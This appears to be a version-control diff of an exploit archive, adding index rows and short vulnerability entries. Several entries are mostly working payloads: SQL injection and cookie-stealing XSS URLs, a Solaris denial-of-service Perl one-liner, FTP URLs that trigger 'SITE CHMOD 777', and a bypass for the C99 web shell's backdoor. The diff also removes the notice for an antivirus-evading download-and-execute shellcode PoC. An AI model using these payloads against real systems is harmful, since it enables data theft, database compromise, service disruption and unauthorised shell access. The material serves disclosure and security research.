34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 'demo.php' Cross Site Scripting Vulnerability",2010-01-13,PaL-D3v1L,php,webapps,0
34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 'id' Parameter Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-05-20,"High-Tech Bridge SA",php,webapps,0
34024,platforms/php/webapps/34024.txt,"Triburom 'forum.php' Cross Site Scripting Vulnerability",2010-01-15,"ViRuSMaN ",php,webapps,0
34025,platforms/php/webapps/34025.txt,"C99.php Shell - Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0

Can't render this file because it is too large.

19
platforms/generator/shellcode/13287.txt
View file

@ -1,19 +0,0 @@
Download & Exec polymorphed shellcode engine POC
This downloading and execution code is not detectable by popular AVs.
Greetz 2:
DarkEagle and Unl0ck researcherz;
Str0ke and milw0rm;
HD Moor and metasploit project;
Maxus, Fuchunic, YrSam, Garry;
Offtopic and PTT team;
---
10X 2:
Batched for shellcode papperz;
Flat assembler project for best'n'fast compiler
---
Phrase of day:
In code we fast ;D ;D ;D
http://www.exploit-db.com/sploits/01242007-shell.tar.gz
# milw0rm.com [2007-01-24]

7
platforms/php/webapps/34021.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40308/info
The 'com_horses' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_horses&task=getnames&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6--

9
platforms/php/webapps/34022.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40310/info
Stiva SHOPPING CART is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Stiva SHOPPING CART 1.0 is vulnerable; other versions may be affected as well.
http://www.example.com/demo.php?id=18&p=1&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

14
platforms/php/webapps/34023.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/40314/info
Lisk CMS is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Lisk CMS 4.4 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/path_to_cp/list_content.php?cl=2%27%22%3E%3Cimg+src=x+onerror=alert%28document.cookie%29%3E
http://www.example.com/path_to_cp/edit_email.php?&id=contact_form_214%27+--+%3Cimg+src=x+onerror=alert%28document.cookie%29%3E
http://www.example.com/path_to_cp/cp_messages.php?action=view_inbox&id=-1+union+select+1,2,3,4,5,6,7,8,9+--+
http://www.example.com/path_to_cp/edit_email.php?&id=X%27+union+select+1,2,3,4,5,6+--+

7
platforms/php/webapps/34024.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40316/info
Triburom is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/forum.php?action=liste&cat=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

37
platforms/php/webapps/34025.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: C99 Shell Authentication Bypass via Backdoor
# Google Dork: inurl:c99.php
# Date: June 23, 2014
# Exploit Author: mandatory ( Matthew Bryant )
# Vendor Homepage: http://ccteam.ru/
# Software Link: https://www.google.com/
# Version: < 1.00 beta
# Tested on:Linux
# CVE: N/A
All C99.php shells are backdoored. To bypass authentication add "?c99shcook[login]=0" to the URL.
e.g. http://127.0.0.1/c99.php?c99shcook[login]=0
The backdoor:
@extract($_REQUEST["c99shcook"]);
Which bypasses the authentication here:
if ($login) {
if (empty($md5_pass)) {
$md5_pass = md5($pass);
}
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
if ($login_txt === false) {
$login_txt = "";
} elseif (empty($login_txt)) {
$login_txt = strip_tags(ereg_replace("&nbsp;|<br>", " ", $donated_html));
}
header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
header("HTTP/1.0 401 Unauthorized");
exit($accessdeniedmess);
}
}
For more info: http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/
~mandatory

11
platforms/php/webapps/34029.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/40324/info
Specialized Data Systems Parent Connect is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Parent Connect 2010.4.11 is vulnerable; other versions may also be affected.
The following example data is available:
password: ' OR '1'='1

9
platforms/solaris/dos/34027.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40319/info
Sun Solaris is prone to a local denial-of-service vulnerability.
Exploiting this issue allows local users to cause denial-of-service conditions in certain filesystem commands.
Sun Solaris 10 is affected, other versions may also be vulnerable.
perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }'

166
platforms/solaris/dos/34028.txt Executable file
View file

@ -0,0 +1,166 @@
source: http://www.securityfocus.com/bid/40320/info
Sun Solaris 'in.ftpd' FTP server is prone to a security vulnerability that allows attackers to perform cross-site request-forgery attacks.
An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site. This may lead to further attacks.
Sun Solaris 10 10/09 and OpenSolaris 2009.06 are vulnerable; other versions may be affected.
<img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">
ftp://ftp.sun.com//////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////stat
or
ftp://ftp.sun.com//////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////pwd
tested od firefox 3.6.3
Example 2 (2048):
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
//////////////////pwd
will be split for:
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
//////////////////
and
pwd
Example 3:
ftp://192.168.11.143///////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
//////////////////////////////////////site chmod 777 .

4
platforms/windows/dos/33860.html
View file

@ -13,9 +13,9 @@ CVE : unknown
<body>
<form id="testfm">
<textarea id="child" value="a1" ></textarea>
<textarea id="child" value="a1" >&lt;/textarea&gt;
<input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>
<textarea id="child3" value="a2" ></textarea>
<textarea id="child3" value="a2" >&lt;/textarea&gt;
<input type="text" name="test1">
</form>

1
platforms/windows/remote/1965.pm
View file

@ -1,4 +1,3 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the

4
platforms/windows/remote/33326.py
View file

@ -1,4 +1,6 @@
## Exploit-DB Note: Must install to 'C:\Program Files\EFS Software\Easy Chat Server'
## Exploit-DB Note: The offset to SEH is influenced by the installation path of the program.
## For this specific exploit to work, easy chat must be installed to:
## 'C:\Program Files\EFS Software\Easy Chat Server'
# Exploit Title: Easy Chat Server 3.1 stack buffer overflow